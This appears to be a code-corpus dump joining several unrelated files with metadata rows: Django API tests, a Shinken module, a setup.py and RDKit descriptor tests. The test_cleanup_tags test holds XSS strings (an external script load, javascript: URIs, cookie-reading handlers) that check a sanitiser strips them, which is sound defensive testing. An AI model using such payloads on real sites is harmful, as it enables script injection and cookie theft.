response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEquals(response.status_code, 201)
doc = {"title": "Project #2", "description": "First project description in here.", 'protective_marking' : self.pm, "status": "published"}
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEquals(response.status_code, 201)
# Bump the classification on the final one
doc['protective_marking']['classification'] = 'PRIVATE'
doc['protective_marking']['classification_short'] = 'PR'
doc['protective_marking']['classification_rank'] = 2
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEquals(response.status_code, 201)
response = self.c.get(self.resourceListURI('project'))
meta, objects = self.get_meta_and_objects(response)
comments_uri = objects[0]['resource_uri'] + 'comments/'
pm = copy.deepcopy(self.pm)
pm['classification'] = 'PERSONAL'
pm['classification_short'] = 'PE'
pm['classification_rank'] = 3
new_comment = {"body" : "perhaps we could extend that project by...",
"title" : "and what about adding to that project with...",
"protective_marking" : pm}
# Just to check its there?
response = self.c.post(comments_uri, json.dumps(new_comment), content_type='application/json', **self.headers2)
check = response['location']
response = self.c.get(check)
response = self.c.get(self.resourceListURI('project'))
meta, objects = self.get_meta_and_objects(response)
#print json.dumps(objects, indent=3)
self.assertEquals(meta['max_pm']['classification'], 'PERSONAL')
#----------------------------------------------------------------------------------------
#@utils.override_settings(DEBUG=True)
class Test_Deletes(Test_Authentication_Base):
def setUp(self):
# Add a user and gain access to the API key and user
self.user_id, self.api_key = self.add_user("staff_user1@projects.com")
user = self.give_privileges(self.user_id, priv='staff')
self.headers = self.build_headers(self.user_id, self.api_key)
user_id2, api_key2 = self.add_user(email='dave@dave.com', first_name='dave', last_name='david')
self.headers2 = self.build_headers(user_id2, api_key2)
self.pm = {"classification" : "PUBLIC",
"classification_short" : "PU",
"classification_rank" : 0,
"national_caveats_primary_name" : "MY EYES ONLY",
"descriptor" : "private",
"codewords" : ["banana1","banana2"],
"codewords_short" : ["b1","b2"],
"national_caveats_members" : ["ME"],
"national_caveats_rank" : 3}
""" Insert documents to start with"""
docs = [{"title": "The first project.",
"description": "First project description in here.",
"tags" : ["physics","maths","geography","sports","english"],
"protective_marking":self.pm,
"status" : "published"},
{"title": "The second project.",
"description": "second project description in here.",
"tags" : ["physics","maths","geography","sports"],
"protective_marking":self.pm,
"status" : "published"}]
# Store the responses
self.doc_locations = []
x = 0
for doc in docs:
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.doc_locations.append(response['location'])
self.assertEqual(response.status_code, 201)
project_url = response['location']
comments_uri = project_url + 'comments/'
new_comment = {"body" : "perhaps we could extend that project by...",
"title" : "and what about adding to that project with...",
"protective_marking" : self.pm}
for i in range(x):
comment_resp = self.c.post(comments_uri, json.dumps(new_comment), content_type='application/json', **self.headers)
x += 1
time.sleep(1)
response = self.c.get(self.resourceListURI('project')+'?data_level=less', **self.headers)
#for x in json.loads(response.content)['objects']:
# print json.dumps(x, indent=4)
def test_delete_comment_decrement_count(self):
""" Delete a comment from an project and check the comment_count reduces """
# Get the id for the project
response = self.c.get(self.resourceListURI('project'), **self.headers)
meta, objects = self.get_meta_and_objects(response)
project1_id = objects[1]['id']
# Count the comments
resp = self.c.get(self.resourceDetailURI('project', project1_id), **self.headers)
meta, objects = self.get_meta_and_objects(resp)
self.assertEquals(objects[0]['comment_count'], 1)
# Delete the comment
path = self.resourceListURI('project')+'%s/comments/0/'%(project1_id)
resp = self.c.delete(path, content_type='application/json', **self.headers)
response = self.c.get(self.resourceDetailURI('project', project1_id), **self.headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(objects[0]['comment_count'], 0)
def test_delete_when_multiple_comments(self):
""" Create a comment - done in setup
Create another comment - done here
Attempt to delete a comment by specific URI
"""
# Get the project id
response = self.c.get(self.resourceListURI('project'), **self.headers)
meta, objects = self.get_meta_and_objects(response)
project1_id = objects[1]['id']
# Build the comments URI
comments_uri = self.resourceDetailURI('project', project1_id)+'comments/'
# Post a new comment
new_comment = {"body" : "perhaps we could extend that project by...",
"title" : "and what about adding to that project with...",
"protective_marking" : self.pm}
comment_resp = self.c.post(comments_uri, json.dumps(new_comment), content_type='application/json', **self.headers)
# Check there are now 2 comments
response = self.c.get(self.resourceDetailURI('project', project1_id), **self.headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(objects[0]['comment_count'], 2)
self.assertEquals(len(objects[0]['comments']), 2)
# Delete the first comment
delete_uri = comments_uri + '0/'
resp = self.c.delete(delete_uri, content_type='application/json', **self.headers)
self.assertEquals(resp.status_code, 204)
# Now check that it definitely got deleted
response = self.c.get(self.resourceDetailURI('project', project1_id), **self.headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(objects[0]['comment_count'], 1)
self.assertEquals(len(objects[0]['comments']), 1)
#@utils.override_settings(DEBUG=True)
class Test_Get_Non_Standard_Fields(Test_Authentication_Base):
def setUp(self):
# Add a user and gain access to the API key and user
self.user_id, self.api_key = self.add_user("staff_user1@projects.com")
user = self.give_privileges(self.user_id, priv='staff')
self.headers = self.build_headers(self.user_id, self.api_key)
user_id2, api_key2 = self.add_user(email='dave@dave.com', first_name='dave', last_name='david')
self.headers2 = self.build_headers(user_id2, api_key2)
self.pm = {"classification" : "PUBLIC",
"classification_short" : "PU",
"classification_rank" : 0,
"national_caveats_primary_name" : "MY EYES ONLY",
"descriptor" : "private",
"codewords" : ["banana1","banana2"],
"codewords_short" : ["b1","b2"],
"national_caveats_members" : ["ME"],
"national_caveats_rank" : 3}
""" Insert documents to start with"""
docs = [{"title": "The first project.",
"description": '<a href="http://www.example.com">First</a> project <b>description</b> in here.',
"tags" : ["physics","maths","geography","sports","english"],
"protective_marking":self.pm,
"status" : "published"},
{"title": "The second project.",
"description": "<h2>second</h2> project <b>description</b> in here." + " The quick brown fox jumped over the lazy dog."*10,
"tags" : ["physics","maths","geography","sports"],
"protective_marking":self.pm,
"status" : "published"}
]
# Store the responses
self.doc_locations = []
x = 0
for doc in docs:
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.doc_locations.append(response['location'])
self.assertEqual(response.status_code, 201)
project_url = response['location']
comments_uri = project_url + 'comments/'
new_comment = {"body" : "perhaps we could <b> extend </b> that project by...",
"title" : "and what about adding to that project with...",
"protective_marking" : self.pm}
for i in range(x):
comment_resp = self.c.post(comments_uri, json.dumps(new_comment), content_type='application/json', **self.headers)
x += 1
time.sleep(1)
def test_check_description_snippet(self):
""" Checks we get back a snippet of the description from html """
# Retrieve all results
response = self.c.get(self.resourceListURI('project'), **self.headers)
meta, objects = self.get_meta_and_objects(response)
#First doc - short
self.assertEquals(objects[0]['description_snippet'], 'First project description in here.')
self.assertEquals(objects[1]['description_snippet'], 'second project description in here. The quick brown fox jumped over the lazy dog. The quick brown fox jumped over the lazy dog. The quick brown fox jumped over the lazy dog. The quick brown fox jumped over the lazy dog. The quick brown fox...')
class Test_Basic_API_Functions(TestCase):
def test_strip_tags(self):
""" Tests stripping html tags"""
text = """<b><a href="http://www.helloworld.com">this is the text</a></b>"""
text = api_functions.strip_tags(text)
self.assertEquals(text, "this is the text")
def test_smart_truncate_short_string(self):
""" Tests truncating on full words"""
text = "the quick brown fox jumped over the lazy dog."
text = api_functions.smart_truncate(content=text, length=180, suffix='...')
self.assertEquals(text, 'the quick brown fox jumped over the lazy dog.')
def test_smart_truncate(self):
""" Tests truncating on full words"""
text = "the quick brown fox jumped over the lazy dog."
text = api_functions.smart_truncate(content=text, length=18, suffix='...')
self.assertEquals(text, 'the quick brown...')
def test_derive_snippet(self):
""" Tests complete snippet derivation """
text = """<b><a href="http://www.helloworld.com">the quick brown fox jumped over the lazy dog.</a></b>"""
text = api_functions.derive_snippet(text_html=text, chrs=18)
self.assertEquals(text, 'the quick brown...')
def test_merge_tag_results(self):
""" Check that 2 lists of dicts get merged correctly - exact match """
project_tags = [{"_id":"hello", "count":1},
{"_id":"world", "count":2},
{"_id":"again", "count":3}]
proj_tags = [{"_id":"hello", "count":1},
{"_id":"world", "count":2},
{"_id":"again", "count":3}]
truth = [{"_id":"hello", "count":2},
{"_id":"world", "count":4},
{"_id":"again", "count":6}]
res = api_functions.merge_tag_results(proj_tags, project_tags)
truth_dict = {}
res_dict = {}
# This works for 2.6 and 2.7, which trhe previous version of code didn't (only 2.7).
for tag in truth:
truth_dict[tag['_id']] = tag['count']
for tag in res:
res_dict[tag['_id']] = tag['count']
for key in truth_dict.keys():
self.assertEquals(truth_dict[key], res_dict[key])
def test_merge_tag_results_gaps(self):
""" Check that 2 lists of dicts get merged correctly - gaps in 1 """
project_tags = [{"_id":"hello", "count":1},
{"_id":"world", "count":2},
{"_id":"again", "count":3}]
proj_tags = [{"_id":"hello", "count":1},
{"_id":"again", "count":3}]
truth = [{"_id":"again", "count":6},
{"_id":"hello", "count":2},
{"_id":"world", "count":2}]
res = api_functions.merge_tag_results(proj_tags, project_tags)
self.assertEquals(truth, res)
def test_cleanup_tags(self):
""" Cleanup the tags submitted from the front-end to avoid XSS risks """
tags = ['<a href="http://badplace.com/script.js">puppies</a>',
'<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>',
"""<IMG SRC="javascript:alert('XSS');">""",
"<IMG SRC=javascript:alert('XSS');>",
"<IMG SRC=JaVaScrIpT:alert('XSS');>",
"""<IMG SRC=`javascript:alert("puppies, 'puppies'");>`""",
'<a onmouseover="alert(document.cookie)">puppies</a>',
'<a onmouseover=alert(document.cookie)>puppies</a>',
'<a onmouseover=alert(document.cookie)>puppies</a>',
'<b>kittens</b>']
clean_tags = api_functions.cleanup_tags(tags)
self.assertEquals(clean_tags, [u'puppies', u'', u'', u'', u'', u'`', u'puppies', u'puppies', u'puppies', u'kittens'])
|
agpl-3.0
| -8,572,646,595,100,724,000 | 46.206424 | 306 | 0.551759 | false |
baloo/shinken
|
shinken/objects/businessimpactmodulation.py
|
1
|
2434
|
#!/usr/bin/env python
#Copyright (C) 2009-2010 :
# Gabes Jean, naparuba@gmail.com
# Gerhard Lausser, Gerhard.Lausser@consol.de
# Gregory Starck, g.starck@gmail.com
# Hartmut Goebel, h.goebel@goebel-consult.de
#
#This file is part of Shinken.
#
#Shinken is free software: you can redistribute it and/or modify
#it under the terms of the GNU Affero General Public License as published by
#the Free Software Foundation, either version 3 of the License, or
#(at your option) any later version.
#
#Shinken is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU Affero General Public License for more details.
#
#You should have received a copy of the GNU Affero General Public License
#along with Shinken. If not, see <http://www.gnu.org/licenses/>.
#The resultmodulation class is used for in scheduler modulation of resulsts
#like the return code or the output.
import time
from item import Item, Items
from shinken.property import StringProp, IntegerProp
class Businessimpactmodulation(Item):
id = 1#0 is always special in database, so we do not take risk here
my_type = 'businessimpactmodulation'
properties = Item.properties.copy()
properties.update({
'business_impact_modulation_name': StringProp(),
'business_impact': IntegerProp(),
'modulation_period': StringProp(default=None),
})
# For debugging purpose only (nice name)
def get_name(self):
return self.business_impact_modulation_name
class Businessimpactmodulations(Items):
name_property = "business_impact_modulation_name"
inner_class = Businessimpactmodulation
def linkify(self, timeperiods):
self.linkify_cm_by_tp(timeperiods)
# We just search for each timeperiod the tp
# and replace the name by the tp
def linkify_cm_by_tp(self, timeperiods):
for rm in self:
mtp_name = rm.modulation_period.strip()
# The new member list, in id
mtp = timeperiods.find_by_name(mtp_name)
if mtp_name != '' and mtp is None:
err = "Error : the business impact modulation '%s' got an unknown modulation_period '%s'" % (rm.get_name(), mtp_name)
rm.configuration_errors.append(err)
rm.modulation_period = mtp
|
agpl-3.0
| -5,847,335,771,418,948,000 | 32.805556 | 133 | 0.689811 | false |
kstaniek/version
|
setup.py
|
1
|
1603
|
"""
Installation script for accelerated upgrade
"""
import codecs
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
from version import get_version
import re
DESCRIPTION = 'Description'
with codecs.open('README.md', 'r', encoding='UTF-8') as readme:
LONG_DESCRIPTION = ''.join(readme)
CLASSIFIERS = [
'Development Status :: 5 - Production/Stable',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Intended Audience :: Developers',
'Natural Language :: English',
'License :: OSI Approved :: Apache Software License',
'Operating System :: POSIX :: Linux',
]
packages = [
'vertest',
]
NAME = 'vertest'
# setup_args["version"] = "1.0.0"
setup_args = dict(
name=NAME,
version="1.0.0",
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
author='Klaudiusz Staniek',
author_email='klstanie [at] cisco.com',
url='https://github.com/kstaniek/version',
download_url='https://github.com/kstaniek/version/tarball/{}'.format(get_version()),
keywords='version test',
tests_require=['tox'],
platforms=['any'],
packages=packages,
package_data={'': ['LICENSE', ], },
package_dir={'vertest': 'vertest'},
include_package_data=True,
install_requires=[],
data_files=[],
license='Apache 2.0',
classifiers=CLASSIFIERS,
zip_safe=False
)
if __name__=="__main__":
if 'upload' in sys.argv:
import package
package.__version__.verify(setup_args['version'])
setup(**setup_args)
|
apache-2.0
| 2,586,842,436,941,875,000 | 23.676923 | 88 | 0.636931 | false |
adalke/rdkit
|
rdkit/Chem/UnitTestGraphDescriptors.2.py
|
1
|
24477
|
# $Id$
#
# Copyright (C) 2003-2006 Rational Discovery LLC
#
# @@ All Rights Reserved @@
# This file is part of the RDKit.
# The contents are covered by the terms of the BSD license
# which is included in the file license.txt, found at the root
# of the RDKit source tree.
#
"""unit testing code for graph-theoretical descriptors
"""
from __future__ import print_function
from rdkit import RDConfig
import unittest,os.path
from rdkit import Chem
from rdkit.Chem import GraphDescriptors,MolSurf,Lipinski,Crippen
def feq(n1,n2,tol=1e-4):
return abs(n1-n2)<=tol
class TestCase(unittest.TestCase):
def setUp(self):
if doLong:
print('\n%s: '%self.shortDescription(),end='')
def testBertzCTShort(self):
""" test calculation of Bertz 'C(T)' index
"""
data = [('C=CC=C',21.01955),
('O=CC=O',25.01955),
('FCC(=O)CF',46.7548875),
('O=C1C=CC(=O)C=C1',148.705216),
('C12C(F)=C(O)C(F)C1C(F)=C(O)C(F)2',315.250442),
('C12CC=CCC1C(=O)C3CC=CCC3C(=O)2',321.539522)]
for smi,CT in data:
m = Chem.MolFromSmiles(smi)
newCT = GraphDescriptors.BertzCT(m, forceDMat = 1)
assert feq(newCT,CT,1e-3),'mol %s (CT calc = %f) should have CT = %f'%(smi,newCT,CT)
def _testBertzCTLong(self):
""" test calculation of Bertz 'C(T)' index
NOTE: this is a backwards compatibility test, because of the changes
w.r.t. the treatment of aromatic atoms in the new version, we need
to ignore molecules with aromatic rings...
"""
col = 1
with open(os.path.join(RDConfig.RDCodeDir,'Chem','test_data','PP_descrs_regress.2.csv'),'r') as inF:
lineNum=0
for line in inF:
lineNum+=1
if line[0] != '#':
splitL = line.split(',')
smi = splitL[0]
m = Chem.MolFromSmiles(smi)
assert m,'line %d, smiles: %s'%(lineNum,smi)
useIt=1
for atom in m.GetAtoms():
if atom.GetIsAromatic():
useIt=0
break
if useIt:
tgtVal = float(splitL[col])
try:
val = GraphDescriptors.BertzCT(m)
except Exception:
val = 666
assert feq(val,tgtVal,1e-4),'line %d, mol %s (CT calc = %f) should have CT = %f'%(lineNum,smi,val,tgtVal)
def __testDesc(self,fileN,col,func):
with open(os.path.join(RDConfig.RDCodeDir,'Chem','test_data',fileN),'r') as inF:
lineNum=0
for line in inF:
lineNum+=1
if line[0] != '#':
splitL = line.split(',')
smi = splitL[0]
m = Chem.MolFromSmiles(smi)
assert m,'line %d, smiles: %s'%(lineNum,smi)
useIt=1
if useIt:
tgtVal = float(splitL[col])
if not feq(tgtVal,666.0):
try:
val = func(m)
except Exception:
val = 666
assert feq(val,tgtVal,1e-4),'line %d, mol %s (calc = %f) should have val = %f'%(lineNum,smi,val,tgtVal)
def testChi0Long(self):
""" test calculation of Chi0
"""
col = 2
self.__testDesc('PP_descrs_regress.csv',col,GraphDescriptors.Chi0)
def _testChi0Long2(self):
""" test calculation of Chi0
"""
col = 2
self.__testDesc('PP_descrs_regress.2.csv',col,GraphDescriptors.Chi0)
def testHallKierAlphaLong(self):
""" test calculation of the Hall-Kier Alpha value
"""
col = 3
self.__testDesc('PP_descrs_regress.csv',col,GraphDescriptors.HallKierAlpha)
def _testHallKierAlphaLong2(self):
""" test calculation of the Hall-Kier Alpha value
"""
col = 3
self.__testDesc('PP_descrs_regress.2.csv',col,GraphDescriptors.HallKierAlpha)
def testIpc(self):
""" test calculation of Ipc.
"""
data = [('CCCCC',1.40564,11.24511),('CCC(C)C',1.37878, 9.65148),('CC(C)(C)C',0.72193,3.60964),('CN(CC)CCC',1.67982,31.91664),('C1CCCCC1',1.71997,34.39946),('CC1CCCCC1',1.68562,47.19725),('Cc1ccccc1',1.68562,47.19725),('CC(C)=C(C)C',1.36096,13.60964),('C#N',1.00000,2.00000),('OC#N',0.91830,2.75489)]
for smi,res1,res2 in data:
m = Chem.MolFromSmiles(smi)
Ipc = GraphDescriptors.Ipc(m, forceDMat=1)
Ipc_avg = GraphDescriptors.Ipc(m,avg = 1, forceDMat=1)
assert feq(Ipc_avg,res1,1e-3),'mol %s (Ipc_avg=%f) should have Ipc_avg=%f'%(smi,Ipc_avg,res1)
assert feq(Ipc,res2,1e-3),'mol %s (Ipc=%f) should have Ipc=%f'%(smi,Ipc,res2)
Ipc = GraphDescriptors.Ipc(m)
Ipc_avg = GraphDescriptors.Ipc(m,avg = 1)
assert feq(Ipc_avg,res1,1e-3),'2nd pass: mol %s (Ipc_avg=%f) should have Ipc_avg=%f'%(smi,Ipc_avg,res1)
assert feq(Ipc,res2,1e-3),'2nd pass: mol %s (Ipc=%f) should have Ipc=%f'%(smi,Ipc,res2)
def _testIpcLong(self):
""" test calculation of Ipc
"""
col = 4
self.__testDesc('PP_descrs_regress.csv',col,GraphDescriptors.Ipc)
def _testIpcLong2(self):
""" test calculation of Ipc
"""
col = 4
self.__testDesc('PP_descrs_regress.2.csv',col,GraphDescriptors.Ipc)
def testKappa1(self):
""" test calculation of the Hall-Kier kappa1 value
corrected data from Tables 3 and 6 of Rev. Comp. Chem. vol 2, 367-422, (1991)
"""
data = [('C12CC2C3CC13',2.344),
('C1CCC12CC2',3.061),
('C1CCCCC1',4.167),
('CCCCCC',6.000),
('CCC(C)C1CCC(C)CC1',9.091),
('CC(C)CC1CCC(C)CC1',9.091),
('CC(C)C1CCC(C)CCC1',9.091)
]
for smi,res in data:
m = Chem.MolFromSmiles(smi)
kappa = GraphDescriptors.Kappa1(m)
assert feq(kappa,res,1e-3),'mol %s (kappa1=%f) should have kappa1=%f'%(smi,kappa,res)
def testKappa2(self):
""" test calculation of the Hall-Kier kappa2 value
corrected data from Tables 5 and 6 of Rev. Comp. Chem. vol 2, 367-422, (1991)
"""
data = [
('[C+2](C)(C)(C)(C)(C)C',0.667),
('[C+](C)(C)(C)(C)(CC)',1.240),
('C(C)(C)(C)(CCC)',2.3444),
('CC(C)CCCC',4.167),
('CCCCCCC',6.000),
('CCCCCC',5.000),
('CCCCCCC',6.000),
('C1CCCC1',1.440),
('C1CCCC1C',1.633),
('C1CCCCC1',2.222),
('C1CCCCCC1',3.061),
('CCCCC',4.00),
('CC=CCCC',4.740),
('C1=CN=CN1',0.884),
('c1ccccc1',1.606),
('c1cnccc1',1.552),
('n1ccncc1',1.500),
('CCCCF',3.930),
('CCCCCl',4.290),
('CCCCBr',4.480),
('CCC(C)C1CCC(C)CC1',4.133),
('CC(C)CC1CCC(C)CC1',4.133),
('CC(C)C1CCC(C)CCC1',4.133)
]
for smi,res in data:
#print smi
m = Chem.MolFromSmiles(smi)
kappa = GraphDescriptors.Kappa2(m)
assert feq(kappa,res,1e-3),'mol %s (kappa2=%f) should have kappa2=%f'%(smi,kappa,res)
def testKappa3(self):
""" test calculation of the Hall-Kier kappa3 value
corrected data from Tables 3 and 6 of Rev. Comp. Chem. vol 2, 367-422, (1991)
"""
data = [
('C[C+](C)(C)(C)C(C)(C)C',2.000),
('CCC(C)C(C)(C)(CC)',2.380),
('CCC(C)CC(C)CC',4.500),
('CC(C)CCC(C)CC',5.878),
('CC(C)CCCC(C)C',8.000),
('CCC(C)C1CCC(C)CC1',2.500),
('CC(C)CC1CCC(C)CC1',3.265),
('CC(C)C1CCC(C)CCC1',2.844)
]
for smi,res in data:
m = Chem.MolFromSmiles(smi)
kappa = GraphDescriptors.Kappa3(m)
assert feq(kappa,res,1e-3),'mol %s (kappa3=%f) should have kappa3=%f'%(smi,kappa,res)
def testKappa3Long(self):
""" test calculation of kappa3
"""
col = 5
self.__testDesc('PP_descrs_regress.csv',col,GraphDescriptors.Kappa3)
def _testKappa3Long2(self):
""" test calculation of kappa3
"""
col = 5
self.__testDesc('PP_descrs_regress.2.csv',col,GraphDescriptors.Kappa3)
def _testLabuteASALong(self):
""" test calculation of Labute's ASA value
"""
col = 6
self.__testDesc('PP_descrs_regress.csv',col,lambda x:MolSurf.LabuteASA(x,includeHs=1))
def _testLabuteASALong2(self):
""" test calculation of Labute's ASA value
"""
col = 6
self.__testDesc('PP_descrs_regress.2.csv',col,lambda x:MolSurf.LabuteASA(x,includeHs=1))
def _testTPSAShortNCI(self):
" Short TPSA test "
inName = RDConfig.RDDataDir+'/NCI/first_200.tpsa.csv'
with open(inName,'r') as inF:
lines = inF.readlines()
for line in lines:
if line[0] != '#':
line.strip()
smi,ans = line.split(',')
ans = float(ans)
mol = Chem.MolFromSmiles(smi)
calc = MolSurf.TPSA(mol)
assert feq(calc,ans),'bad TPSA for SMILES %s (%.2f != %.2f)'%(smi,calc,ans)
def _testTPSALongNCI(self):
" Long TPSA test "
fileN = 'tpsa_regr.csv'
with open(os.path.join(RDConfig.RDCodeDir,'Chem','test_data',fileN),'r') as inF:
lines = inF.readlines()
lineNo = 0
for line in lines:
lineNo+=1
if line[0] != '#':
line.strip()
smi,ans = line.split(',')
ans = float(ans)
mol = Chem.MolFromSmiles(smi)
assert mol,"line %d, failed for smiles: %s"%(lineNo,smi)
calc = MolSurf.TPSA(mol)
assert feq(calc,ans),'line %d: bad TPSA for SMILES %s (%.2f != %.2f)'%(lineNo,smi,calc,ans)
def testTPSALong(self):
""" test calculation of TPSA
"""
col = 28
self.__testDesc('PP_descrs_regress.csv',col,MolSurf.TPSA)
def _testTPSALong2(self):
""" test calculation of TPSA
"""
col = 28
self.__testDesc('PP_descrs_regress.2.csv',col,MolSurf.TPSA)
def _testLipinskiLong(self):
""" test calculation of Lipinski params
"""
fName = 'PP_descrs_regress.csv'
# we can't do H Acceptors for these pyridine-containing molecules
# because the values will be wrong for EVERY one.
#col = 29
#self.__testDesc(fName,col,Lipinski.NumHAcceptors)
col = 30
self.__testDesc(fName,col,Lipinski.NumHDonors)
col = 31
self.__testDesc(fName,col,Lipinski.NumHeteroatoms)
col = 32
self.__testDesc(fName,col,Lipinski.NumRotatableBonds)
def _testHAcceptorsLong(self):
""" test calculation of Lipinski params
"""
fName = 'Block_regress.Lip.csv'
col = 1
self.__testDesc(fName,col,Lipinski.NumHAcceptors)
def _testHDonorsLong(self):
""" test calculation of Lipinski params
"""
fName = 'Block_regress.Lip.csv'
col = 2
self.__testDesc(fName,col,Lipinski.NumHDonors)
def _testHeterosLong(self):
""" test calculation of Lipinski params
"""
fName = 'Block_regress.Lip.csv'
col = 3
self.__testDesc(fName,col,Lipinski.NumHeteroatoms)
def _testRotBondsLong(self):
""" test calculation of Lipinski params
"""
fName = 'Block_regress.Lip.csv'
col = 4
self.__testDesc(fName,col,Lipinski.NumRotatableBonds)
def _testLogPLong(self):
""" test calculation of Lipinski params
"""
fName = 'PP_descrs_regress.csv'
col = 33
self.__testDesc(fName,col,lambda x:Crippen.MolLogP(x,includeHs=1))
def _testLogPLong2(self):
""" test calculation of Lipinski params
"""
fName = 'PP_descrs_regress.2.csv'
col = 33
self.__testDesc(fName,col,lambda x:Crippen.MolLogP(x,includeHs=1))
def _testMOELong(self):
""" test calculation of MOE-type descriptors
"""
fName = 'PP_descrs_regress.VSA.csv'
col = 1
self.__testDesc(fName,col,MolSurf.SMR_VSA1)
col = 2
self.__testDesc(fName,col,MolSurf.SMR_VSA10)
col = 3
self.__testDesc(fName,col,MolSurf.SMR_VSA2)
col = 4
self.__testDesc(fName,col,MolSurf.SMR_VSA3)
col = 5
self.__testDesc(fName,col,MolSurf.SMR_VSA4)
col = 6
self.__testDesc(fName,col,MolSurf.SMR_VSA5)
col = 7
self.__testDesc(fName,col,MolSurf.SMR_VSA6)
col = 8
self.__testDesc(fName,col,MolSurf.SMR_VSA7)
col = 9
self.__testDesc(fName,col,MolSurf.SMR_VSA8)
col = 10
self.__testDesc(fName,col,MolSurf.SMR_VSA9)
col = 11
self.__testDesc(fName,col,MolSurf.SlogP_VSA1)
col = 12
self.__testDesc(fName,col,MolSurf.SlogP_VSA10)
col = 13
self.__testDesc(fName,col,MolSurf.SlogP_VSA11)
col = 14
self.__testDesc(fName,col,MolSurf.SlogP_VSA12)
def _testMOELong2(self):
""" test calculation of MOE-type descriptors
"""
fName = 'PP_descrs_regress.VSA.2.csv'
col = 1
self.__testDesc(fName,col,MolSurf.SMR_VSA1)
col = 2
self.__testDesc(fName,col,MolSurf.SMR_VSA10)
col = 11
self.__testDesc(fName,col,MolSurf.SlogP_VSA1)
col = 12
self.__testDesc(fName,col,MolSurf.SlogP_VSA10)
col = 13
self.__testDesc(fName,col,MolSurf.SlogP_VSA11)
col = 14
self.__testDesc(fName,col,MolSurf.SlogP_VSA12)
def testBalabanJ(self):
""" test calculation of the Balaban J value
J values are from Balaban's paper and have had roundoff
errors and typos corrected.
"""
data = [# alkanes
('CC',1.0),('CCC',1.6330),
('CCCC',1.9747),('CC(C)C',2.3238),
('CCCCC',2.1906),('CC(C)CC',2.5396),('CC(C)(C)C',3.0237),
('CCCCCC',2.3391),('CC(C)CCC',2.6272),('CCC(C)CC',2.7542),('CC(C)(C)CC',3.1685),
('CC(C)C(C)C',2.9935),
# cycloalkanes
('C1CCCCC1',2.0000),
('C1C(C)CCCC1',2.1229),
('C1C(CC)CCCC1',2.1250),
('C1C(C)C(C)CCC1',2.2794),
('C1C(C)CC(C)CC1',2.2307),
('C1C(C)CCC(C)C1',2.1924),
('C1C(CCC)CCCC1',2.0779),
('C1C(C(C)C)CCCC1',2.2284),
('C1C(CC)C(C)CCC1',2.2973),
('C1C(CC)CC(C)CC1',2.2317),
('C1C(CC)CCC(C)C1',2.1804),
('C1C(C)C(C)C(C)CC1',2.4133),
('C1C(C)C(C)CC(C)C1',2.3462),
('C1C(C)CC(C)CC1(C)',2.3409),
# aromatics
('c1ccccc1',3.0000),
('c1c(C)cccc1',3.0215),
('c1c(CC)cccc1',2.8321),
('c1c(C)c(C)ccc1',3.1349),
('c1c(C)cc(C)cc1',3.0777),
('c1c(C)ccc(C)c1',3.0325),
('c1c(CCC)cccc1',2.6149),
('c1c(C(C)C)cccc1',2.8483),
('c1c(CC)c(C)ccc1',3.0065),
('c1c(CC)cc(C)cc1',2.9369),
('c1c(CC)ccc(C)c1',2.8816),
('c1c(C)c(C)c(C)cc1',3.2478),
('c1c(C)c(C)cc(C)c1',3.1717),
('c1c(C)cc(C)cc1(C)',3.1657)
]
for smi,res in data:
m = Chem.MolFromSmiles(smi)
j = GraphDescriptors.BalabanJ(m,forceDMat=1)
assert feq(j,res),'mol %s (J=%f) should have J=%f'%(smi,j,res)
j = GraphDescriptors.BalabanJ(m)
assert feq(j,res),'second pass: mol %s (J=%f) should have J=%f'%(smi,j,res)
def _testBalabanJLong(self):
""" test calculation of the balaban j value
"""
fName = 'PP_descrs_regress.rest.2.csv'
col = 1
self.__testDesc(fName,col,GraphDescriptors.BalabanJ)
def _testKappa1Long(self):
""" test calculation of kappa1
"""
fName = 'PP_descrs_regress.rest.2.csv'
col = 31
self.__testDesc(fName,col,GraphDescriptors.Kappa1)
def _testKappa2Long(self):
""" test calculation of kappa2
"""
fName = 'PP_descrs_regress.rest.2.csv'
col = 32
self.__testDesc(fName,col,GraphDescriptors.Kappa2)
def _testChi0Long(self):
fName = 'PP_descrs_regress.rest.2.csv'
col = 5
self.__testDesc(fName,col,GraphDescriptors.Chi0)
def _testChi1Long(self):
fName = 'PP_descrs_regress.rest.2.csv'
col = 8
self.__testDesc(fName,col,GraphDescriptors.Chi1)
def _testChi0v(self):
""" test calculation of Chi0v
"""
data = [('CCCCCC',4.828),('CCC(C)CC',4.992),('CC(C)CCC',4.992),
('CC(C)C(C)C',5.155),('CC(C)(C)CC',5.207),
('CCCCCO',4.276),('CCC(O)CC',4.439),('CC(O)(C)CC',4.654),('c1ccccc1O',3.834),
('CCCl',2.841),('CCBr',3.671),('CCI',4.242)]
for smi,res in data:
m = Chem.MolFromSmiles(smi)
chi = GraphDescriptors.Chi0v(m)
assert feq(chi,res,1e-3),'mol %s (Chi0v=%f) should have Chi0V=%f'%(smi,chi,res)
def _testChi0vLong(self):
fName = 'PP_descrs_regress.rest.2.csv'
col = 7
self.__testDesc(fName,col,GraphDescriptors.Chi0v)
def testChi1v(self):
""" test calculation of Chi1v
"""
data = [('CCCCCC',2.914),('CCC(C)CC',2.808),('CC(C)CCC',2.770),
('CC(C)C(C)C',2.643),('CC(C)(C)CC',2.561),
('CCCCCO',2.523),('CCC(O)CC',2.489),('CC(O)(C)CC',2.284),('c1ccccc1O',2.134)]
for smi,res in data:
m = Chem.MolFromSmiles(smi)
chi = GraphDescriptors.Chi1v(m)
assert feq(chi,res,1e-3),'mol %s (Chi1v=%f) should have Chi1V=%f'%(smi,chi,res)
def _testChi1vLong(self):
fName = 'PP_descrs_regress.rest.2.csv'
col = 10
